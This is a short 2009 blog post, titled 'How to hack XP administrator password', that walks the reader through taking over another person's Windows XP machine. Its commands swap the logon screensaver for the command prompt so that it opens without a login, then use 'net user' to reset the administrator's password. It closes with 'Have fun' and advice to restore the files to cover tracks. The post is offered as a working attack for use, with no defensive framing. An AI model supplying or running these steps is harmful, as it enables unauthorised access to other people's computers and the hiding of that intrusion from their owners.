Friday, January 16, 2009

HOW TO HACK XP ADMINISTRATOR PASSWORD

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
Start -> Run -> cmd
cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr rename cmd.exe logon.scr
exit
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes
"net user password"

If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

No comments: